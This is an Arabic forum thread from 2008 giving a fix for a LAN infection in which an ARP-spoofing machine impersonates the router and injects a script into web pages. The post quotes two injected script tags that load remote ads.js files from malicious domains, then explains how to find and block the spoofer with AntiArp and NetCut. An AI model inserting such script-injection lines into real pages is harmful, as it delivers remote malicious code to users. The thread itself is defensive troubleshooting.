النتائج 1 إلى 3 من 3

الموضوع: الحل القاتل لفيرس http://g.asdafdgfgf.com/ads.js و http://hk.www404.cn:53/ads.js

  1. 09-06-2008 #1
    عضو نشيط
    Hazem Noor
    تاريخ التسجيل
    May 2007
    المشاركات
    117

    الحل القاتل لفيرس http://g.asdafdgfgf.com/ads.js و http://hk.www404.cn:53/ads.js



    الحل القاتل لفيرس http://g.asdafdgfgf.com/ads.js و http://hk.www404.cn:53/ads.js و مشاكل الشبكة

    بسم الله الرحمن الرحيم


    الوقاية خير من العلاج

    الحل بدون فورمات و بدون أي برامج انتي فايرس
    ----------------------------------------------------
    المشكلة سببها إن فيه جهاز في الشبكة بيعمل spoof (ممكن نقولها تجسس) ببرنامج arpspoof أو بأي برنامج آخر و في هذه الحالة يكون

    الجهاز بمثابة الراوتر للأجهزة الأخرى أي أنه ينتحل شكصية الراوتر

    و الجهاز دا مصاب بالفيرس و بالتالي فإن كل الأجهزة المتصلة على الشبكة تصاب بالفيرس المتمثل في كود جافا سكريبت بينضاف لكل

    صفحة نت يتم فتحها
    الكود الذي يضاف كان من قبل
    <SCRIPT LANGUAGE="s c r i p t 1.2" SRC="http://g.asdafdgfgf.com/ads.js"></SCRIPT>

    و الإصدار الجديد منه هو
    <script language="s c r i p t" SRC="http://hk.www404.cn:53/ads.js"></script>

    و لكي تعرف هذا الجهاز الذي يخرب في الشبكة - و غالباً هو مش بيكون عارف إنه مصاب بالفيرس - إستخدم برنامج AntiArp

    حمل البرنامج و فك الضغط ستجد

    شرح الإستخدام الصحيح لبرنامج AntiArp

    لو جهازك فيه الفيرس و شغلت البرنامج ستجد الرقم الموجود ( mac address ) مثال ( 00-14-85-78-05-62 ) هذا هو عنوان الجهاز الذي

    يقوم بعمل spoof في الشبكة
    نقوم بفتح برناج netcut - و نبحث عن نفس الرقم تحت خانة Physical address سيكون مثل ( 00:14:85:78:05:62 ) - مع إستبدال

    الشرطة بـ ":"

    و نعرفه هو مين نتصرف معاه بعدين بالطريقة المناسبة

    سنجد الآي بي الخاص به نفس آي بي الراوتر و سيكون في أعلى القائمة ، و يكون الآي بي الآخر المشابه له هو آيبي الراوتر الحقيقي

    مثلاُ ( 10.0.0.2 )

    و نقم بنسخ القيمة المقابلة ( physical Address ) و ستكون مثلاُ ( 00:30:CA:815:AE ) ننسخها في ملف نصي سنحتاجه دائماً و لن

    يتغير بعد ذلك ( يكون ثابت لنفس الراوتر دائماً ) ، نضع هذا العنوان في برنامج AntiArp بدلاً من عنوان الجهاز الراوتر المزيف و يكون عنوان

    الراوتر مثلاُ ( 00:30:CA:815:AE ) و تقوم بعمل Stop ثم Run

    و بذلك فأنت متصل بالراوتر الحقيقي و ليس بأي جهاز آخر على الشبكة

    الطريقة دي بتحميك من الجسس على جهازك من على الشبكة اللي انت متصل بها

    و برنامج AntiArp هذه آمنه و لا تسبب أي مشاكل للجهاز على الإطلاق ( حيث يوجد نسخة أخرى تسبب مشاكل في الهاردوير للجهاز )

    و الرابط التالي به برنامج الـ AntiArp و برنامج الـ Netcut

    ستجد ملف WinPcap_4_0 قم بتسطيبه أولاً ثم قم بتسطيب الـ Netcut و الـ AntiArp يعمل بدون تسطيب

    http://up.mehalla.net/?d=mehalla_net_sO3nkqayLl.zip

    و اي مشكلة أنا حاضر





    التعديل الأخير تم بواسطة Hazem Noor ; 09-06-2008 الساعة 04:19 AM
    __________________
    حازم نور
    http://about.me/Hazem
    رد مع اقتباس رد مع اقتباس Hazem Noor غير متواجد حالياً

  2. 10-06-2008 #2
    عضو شرف
    الصورة الرمزية O33O
    O33O
    تاريخ التسجيل
    Sep 2006
    المشاركات
    1,420


    اعتذر عن الخروج عن الموضوع
    اخى الكريم حازم ارجو الرد على الأيميل المرسل لك من ايميل


    mmuz [at] mmuz .com


    تحياتى





    رد مع اقتباس رد مع اقتباس O33O غير متواجد حالياً
  3. 10-06-2008 #3
    عضو نشيط
    Hazem Noor
    تاريخ التسجيل
    May 2007
    المشاركات
    117


    تمت الإضافة أخي الكريم





    __________________
    حازم نور
    http://about.me/Hazem
    رد مع اقتباس رد مع اقتباس Hazem Noor غير متواجد حالياً




« في بيتنا هامستر :D | فيديو - زيادة الكفاءة للسياره »

ضوابط المشاركة

  • لا تستطيع إضافة مواضيع جديدة
  • لا تستطيع الرد على المواضيع
  • لا تستطيع إرفاق ملفات
  • لا تستطيع تعديل مشاركاتك
  •  

قوانين المنتدى


أضف موقعك هنا| اخبار السيارات | حراج | شقق للايجار في الكويت | بيوت للبيع في الكويت | دليل الكويت العقاري | مقروء | شركة كشف تسربات المياه | شركة عزل اسطح بالرياض | عزل فوم بالرياض| عزل اسطح بالرياض | كشف تسربات المياة بالرياض | شركة عزل اسطح بالرياض